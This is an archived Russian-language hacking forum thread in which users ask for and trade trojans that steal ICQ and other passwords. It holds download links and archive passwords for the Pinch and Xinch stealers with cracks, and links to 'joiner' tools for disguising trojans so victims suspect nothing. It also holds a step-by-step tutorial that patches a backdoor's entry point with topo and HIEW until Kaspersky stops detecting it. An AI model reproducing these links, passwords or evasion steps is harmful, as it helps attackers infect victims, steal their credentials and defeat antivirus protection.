PDA

Просмотр полной версии : Icq троян


chezar
03.02.2006, 16:39
Здраствуйте !!! Посоветуйте плзз троя для аси чтоб пароли воровал !!! И если не сложно Описание к нему ну и сам трой :rolleyes:

D1mOn
03.02.2006, 16:41
Pinch v 2.57+Crack - http://xroot.hut1.ru/downloads.php?cat_id=4&download_id=98
Pinch v 2.58 + Crack - http://xroot.hut1.ru/downloads.php?cat_id=4&download_id=127

Nova
03.02.2006, 16:41
Pinch отличный троян воует от практически всего....
И пржде чем создавать эту темку юзай поиск а то таких тем уже валом...

Nova
03.02.2006, 16:42
pinch
Блин опередил....

D1mOn
03.02.2006, 16:43
ахаха, я ещё и ссылки дал)))ггг

Hitman_2
03.02.2006, 16:47
Xinch 1.5 private
В его комплект входят все возможности пинча 2.58 + он не палится антивирусами
_http://www.flooder.biz/uploads/xinch1.5alfa3_with_keygen.rar
pass:123

Пинч 2.58 отдыхает... Русский софт forever!!! =))

Nexwill
03.02.2006, 17:42
Я вот не понял.. что значит для аси???
Покажите мне хоть один троян который пароли от аси не ворует? =)

syas
03.02.2006, 19:26
у мя есть трой который ворует пассы тока от аси , стучи в асю

A110ut
04.02.2006, 06:22
трой который ворует пассы тока от аси
лол))) реально нужная вещь)

A110ut
04.02.2006, 06:52
+ он не палится антивирусами
Ну допустим здесь ты погорячился:] Нод находит целых 3 трояна + неизвестный вирус)
ЗЫ:за линк спс

lexa
04.02.2006, 07:24
да нафиг он нужет лучше писать свой !!!

lexa
04.02.2006, 07:25
я вон написал и уже пол года не палиться !и отчеты регулярно приходят !

Hitman_2
04.02.2006, 07:33
Представляю... А возможности твоего троя сравнимы с возможностями Пинча??? А сервер сколько весит??? Наверняка как минимум 200kb
А у Пинча, Хинча сервер со всеми включёнными настройками 25kb + много всякмх фичей

chezar
04.02.2006, 14:37
Плзз а инструкцию к Xinch выложите кто нить, тока не ту что в папке вместе с ним !!!

$ZLO$
04.02.2006, 15:31
Плзз а инструкцию к Xinch выложите кто нить, тока не ту что в папке вместе с ним !!!
http://www.vipusers.net/modules.php?name=Forums&file=viewtopic&t=673&sid=526a0a81c33a6b5f52b9614efb973d32
тут инструкция к пинч про, от ксинча мало чем отличается.

chezar
05.02.2006, 02:42
Фигня какаято с Ксинчем Пытаюсь отослать тест письмо он пишет не могу послать ...
Пытаюсь скомпилировать не компилирует (по серединекомпиляции застревает)...
Вощем в чем дело понять немогу .... Помогите кто нить или дайте ссылку на пинч 2.58 нормальную плзз !!!

petrovich-lamer
05.02.2006, 03:02
Помогите кто нить или дайте ссылку на пинч 2.58 нормальную плзз !!!

на первой страница этого топика. ДАРАГОЙ
с тебя плюЦ :D :D

petrovich-lamer
05.02.2006, 04:09
хех..
терь присоединяюсь к пред посту - дайте пинч без пароля на анхив, или скажите пас от этого, 2.58 =)

petrovich-lamer
05.02.2006, 04:21
блин, че все архивы битые ???
один ен открывается, пароль к нему не подбирается, другой - ваще нету билдера в хинче этом!!!
Кто-нибудь имеет НОРМАЛЬНЫЕ ЭТИ ТРОИ ????
угостите плз!
чтобы хоть посмотреть, что это такое - 25 кб :)
тока пжста не самими 25-ю килобайтами, а троем самим )

chezar
05.02.2006, 11:49
Да плзз если не жаль !!! В яндексе,гугле, и рамблее искал нашел ... Но нигде кряк неработает. Я даж видео по взлому пинча сморел серавноне работает !!!!

w4rd3n
05.02.2006, 16:32
Есть троян который пиздит пассы от ась icq(lite 2003 и т.д.) qip @RQ trilian aim miranda отсылает через гейцт пароли на мыло. ася 30003111

lexa
05.02.2006, 17:08
icq(lite 2003 и т.д.) qip @RQ trilian aim miranda все тоже самое делает мой троян и ещё от mail ftp да и кеши присылает и тоже не палиться ! странно да ! =))) да и ещё висит там запускаеться по времени и ещй и команды исполняет твои !!

lexa
05.02.2006, 17:10
Xinch 1.5 private
Пинч 2.58 отдыхает... Русский софт forever!!! =))
а пинч что не русский! странно а я думал что его сделал
cobans ! чтото ты ты путаешь ! а за ссылочку конечно сенкс !

Hitman_2
05.02.2006, 18:03
Пинч на каком языке написан??? На инглише...
А хинч??? на русском!!! =))

lexa
05.02.2006, 19:21
ахааха

пинч писал кобан :))
хинч - передранный внаглую пинч )))
(если не верите - скачайте пинч и посмотрите на структуру и систему работы )
+))) копирайт стиллеры - те кто хинч делал, вот и всё =)) ....

Xos{HaCKeR}
05.02.2006, 21:27
народ у меня вот такая проблема ...скачал пин 2.58 запускаю билдер там типо надо ввсети пароль и имя я ввожу те ,которые даны в хелпе но все равно пишет что неправильные ...чё делать??

Jonathan Allen
05.02.2006, 21:52
Там должна быть папка "keygen" в ней смотри.

Xos{HaCKeR}
05.02.2006, 22:26
ТАМ ТАКОЙ папки нет а троян я качал отсюда http://tenebras.netsec.ru/pinch258.rar
pass: ^rin$567)ds

Xos{HaCKeR}
06.02.2006, 00:09
ПОМОГИТЕ ПЛЫЗ

lexa
08.02.2006, 10:51
Представляю... А возможности твоего троя сравнимы с возможностями Пинча??? А сервер сколько весит??? Наверняка как минимум 200kb
А у Пинча, Хинча сервер со всеми включёнными настройками 25kb + много всякмх фичей
весит мой server 7 кб

limpompo
08.02.2006, 11:20
Так XPinch палиться AVP сегодня тэстил...

Robin-bad
08.02.2006, 13:56
Да палится, ещё как, даже с базами прошлого месяца, нужен криптор и он есть... :)

NewJey
14.02.2006, 16:45
Что-то у меня xinch1.5alfa3_with_keygen.rar не хочет IP SMTP сервера показывать.Говорит что .Не могу узнать.!
В чём проблема?Переустанавливал уже раз 10ть!И регистр чистил!

Mobile
19.02.2006, 14:30
Xinch 1.5 private
В его комплект входят все возможности пинча 2.58 + он не палится антивирусами
_http://www.flooder.biz/uploads/xinch1.5alfa3_with_keygen.rar
pass:123

Пинч 2.58 отдыхает... Русский софт forever!!! =))
У меня палится...

Allen
20.02.2006, 22:55
Joiner (http://kisin.boom.ru/Trojans/Join155.zip) -Очень нужная программа для впаривания троянов, она сливает троян с другим файлом, что бы тот кому вы его впариваете ничего не заподозрил. 414kb

Joiner2.5 (http://kisin.boom.ru/Trojans/joiner2.5.zip) -Програмка склеивает 2 фаила в 1!Закрывает Антивирусники и Фаирволы!!! 60kb

Electro
21.02.2006, 00:07
Ну ребята сколько повторит, я же уже написал что джоинеры палят трой.Так как они в базе антвирей и скленные ими файлы сразу выдают себя даже в том случае , если ты джоинишь не вирусов а постых екзешок!

Electro
21.02.2006, 00:11
У меня палится...
У тебя какой айтвир стоит?

Electro
21.02.2006, 00:36
хех..
терь присоединяюсь к пред посту - дайте пинч без пароля на анхив, или скажите пас от этого, 2.58 =)
pass: ^rin$567)ds
откроешь на + нажимай)))

bxN5
21.02.2006, 01:01
Короче зделал вывод если хочеш не палящийся троян плати деньги!

TheFile
21.02.2006, 01:16
Кстати нащёт денег читай в подписи

Electro
21.02.2006, 01:18
Во...ну наконец то )) правильно! платить надо )

bxN5
21.02.2006, 01:38
Г-ЫС С ТЕБЯ РЕПА=)))))))

Electro
21.02.2006, 19:47
Зачем тебе столько реп ? потом живот будеть болеть ))))))
На вот последний раз я такой щедрый ))) а заслужил это за хорошое мудрое слово))

Electro
21.02.2006, 19:49
дык (((
Вы должны добавить репутацию кому-то еще, прежде чем сможете снова добавить ее Dala$$.

petrovich-lamer
23.02.2006, 14:30
блин...
все получается, отчеты шлет...
тока они пустые приходят :(
0 кб

almaz
23.02.2006, 22:15
Все эти кони и клей в паблике и паляться давно AVP.Можно только купить приватных коней с которыми будет гуд.Лучше напишите мануал как самому написать трой,что поизучать для этого,в паблике есть исходники Pins,на основе их можно и свой зделать.Лучше учиться и развиваться,чем брать уже готовое...

A110ut
24.02.2006, 07:05
ну так вперед! учись и развЕвайся... кто ж мешает?
может когда "разовешся" до неимоверных приделов собственный мануал выложишь

MegaZLO
27.02.2006, 23:26
блин...
все получается, отчеты шлет...
тока они пустые приходят
0 кб

(для тех у кого такая же трабла)
могу кнечно ошибаться
я открываю отчеты зебатом отчет нулевой (точнее само вложение в письме 0)
а если аут глюком то усе фурычит (тоесть фаилик имеет нормальный)

Allen
07.03.2006, 02:19
Ребята, cлышал я есть такая прога, прогоняешь вирус или трой через неё, и трой не палится :) .
Правда есть такая? :confused:

seeattact
07.03.2006, 02:59
Есть такие - это крипторы.

Allen
08.03.2006, 02:56
Есть такие - это крипторы.
Где взять?
Как она работает? :confused:

seeattact
08.03.2006, 03:09
Где взять?
Как она работает? :confused:
купить http://forum.antichat.ru/thread14355.html

=Be$=
08.03.2006, 03:58
Крипторы тебе помогут только от проверки монитором.

Allen
08.03.2006, 03:59
купить http://forum.antichat.ru/thread14355.html
:confused: Может, бесплатно есть? :confused:

seeattact
08.03.2006, 04:04
:confused: Может, бесплатно есть? :confused:
есть
ищи тут http://yandex.ru/yandsearch?stype=www&nl=0&text=%E1%E5%F1%EF%EB%E0%F2%ED%FB%E5+%EA%F0%E8%EF%F 2%EE%F0%FB

Allen
08.03.2006, 05:29
Вот (http://slil.ru/22575088).
Зверька зовут Xinch 1.53 alpha 4.
Ворует ВСЁ! :)

bxN5
08.03.2006, 12:12
http://www.wasm.ru/toollist.php?list=12

Незнаю не пробовал юзайте может понравитса)

DoGwooD
08.03.2006, 20:05
Вот статейка

Как спрятать Троян (точнее EXE-файл который определяется антивирусом) ...

Что для этого нужно:

1) По принципу сам троян (В качестве трояна я взял редактор сервера Троян Lamer's Death который определяется как

------------------------------------------------------------------------------------------

C:\WINDOWS\Рабочий стол\ld27b3\editor.exe Упакован UPX

C:\WINDOWS\Рабочий стол\ld27b3\editor.exe Инфицирован Backdoor.Death.26

------------------------------------------------------------------------------------------

То, что он уже пакованый UPX это нам немешает (хотя, может кто и хочет распаковать тот пусть распаковывает...)

2) Программа под названием topo.exe или topo12.exe

С ее помощью открываем наш зловещий вирус editor.exe

от программы сразу будет предложение создать новую секцию или использовать старую ?


http://img394.imageshack.us/img394/8525/image0017fx.jpg

по сути можно выбрать и тот, и другой вариант, но советую использовать старую

так как антивирусы могут использовать название секции в будущем...

ДЛЯ НАГЛЯДНОСТИ ПРИМЕР

В самой программе ставим галочку на слове Redirect Entrypoint

и добавляем 15 байт (Здесь также используется ваша фантазия... можете вписывать туда свою дату рождения...)

БОЛЕЕ ПОДРОБНО

после всего сделаного жмем "Do It!"

http://img394.imageshack.us/img394/1111/image0025xr.jpg

теперь мы поменяли начало загрузки трояна и переехал он на новый адрес... 004974F1

теперь проверяем наш троянчик Касперским...

бля орет сволочуга

но говорит что наш вирус упакован PE_Patch

--------------------------------------------------------------------------------------------

C:\WINDOWS\Рабочий стол\ld27b3\editor.exe Упакован PE_Patch

C:\WINDOWS\Рабочий стол\ld27b3\editor.exe Упакован UPX

C:\WINDOWS\Рабочий стол\ld27b3\editor.exe Инфицирован Backdoor.Death.26

--------------------------------------------------------------------------------------------

3) Вот теперь мы берем в руки HEX-Editor HIEW.EXE

запускаем HIEW.EXE выбираем из всех файлов наш зловещий editor.exe

жмем последовательно Enter, далее F4, далее F3, далее F8, далее F5

бог ты мой какое чудо мы оказались на адресе 004974F1

и начиная с адреса 004974F1 до адреса 004974FB

мы видим эти вот самые циферки состоящие из 90 (это и есть наши добавленые 15 байт)

.004974F1: 90 nop

.004974F2: 90 nop

.004974F3: 90 nop

.004974F4: 90 nop

.004974F5: 90 nop

.004974F6: 90 nop

.004974F7: 90 nop

.004974F8: 90 nop

.004974F9: 90 nop

.004974FA: 90 nop

.004974FB: E960FEFFFF jmp .000497360 -------- (1)

дело в том что антивирус видит эту часть кода и узнает ее...

далее едет в ход так называемый "МЕТОД ТЫКА"

жму F3 и редактирую эти циферки...

гы... а по простому вставляю мусор

проще говоря замените в некоторых местах значение 90 (вот она хитрость...)

самого програмного кода они все равно невыполняют так что меняйте их как хотите...



004974F1: 90 nop

004974F2: 90 nop

004974F3: 0000 add [eax],al (здесь наклепал нулей)

004974F5: 90 nop

004974F6: 90 nop

004974F7: 91 xchg ecx,eax (здеcь вставил еденицу...)

004974F8: 90 nop

004974F9: 90 nop

004974FA: 90 nop

004974FB: E960FEFFFF jmp .000497360 -------- (1)

после проделоного сохраняем изменения жмем F9

и выходим из программы

проверяем на работоспособность нашь зловещий вирус...

Гы работает и ничего не изменилось открывается и ошибок никаких просто зашибись все...

проверяем его касперским и тот тоже не жалуется говорит что все оки...

---------------------------------------------------------------------------------------------

C:\WINDOWS\Рабочий стол\ld27b3\editor.exe OK

---------------------------------------------------------------------------------------------

Воть :cool: в любом случае можно не зная языка программирования упрятать exe-файл вируса либо троянца...

seeattact
08.03.2006, 20:09
выложи прогу

DoGwooD
08.03.2006, 20:13
выложи прогу

Я бы с радостью, сам когда-то это делал, винду снёс, проги вместе с ней...

Поищи по названию topo12.exe а вторая HIEW.EXE

seeattact
08.03.2006, 20:40
Я бы с радостью, сам когда-то это делал, винду снёс, проги вместе с ней...

Поищи по названию topo12.exe а вторая HIEW.EXE
И чё ты винду снёс и решил распрощятся с этой прогой.Ты ведь же её откуда то взял.Или просто ты эту статью скопировал откуда нибудь.
например отсюда http://sprutic.boom.ru/antiavp.htm

seeattact
08.03.2006, 20:44
программу topo12 можно скачать отсюда http://www.team-x.ru/xforum/index.html?act=Attach&type=post&id=20172

DoGwooD
08.03.2006, 20:48
Это было год назад =) Ищи в нете, проги халявные...

seeattact
08.03.2006, 20:52
Это бло год назад =) Ищи в нетероги халявные
ты сам понял что написал.

DoGwooD
08.03.2006, 20:55
^^ теперь да

вот, вторую прогу выложил ;> http://rapidshare.de/files/15007859/hiew32.exe.html

A110ut
08.03.2006, 20:58
topo12.exe - Win32/Topo.12 Virtool =)
ИМХО алгоритм уже давно в базах. Хотя не факт...

Allen
08.03.2006, 21:57
topo12.exe - Win32/Topo.12 Virtool =)
ИМХО алгоритм уже давно в базах. Хотя не факт...
Факт.:)

A110ut
09.03.2006, 00:24
что и следовало ожидать =)
зы: Особенно если обратить внимание на слова автора "Это было год назад" :)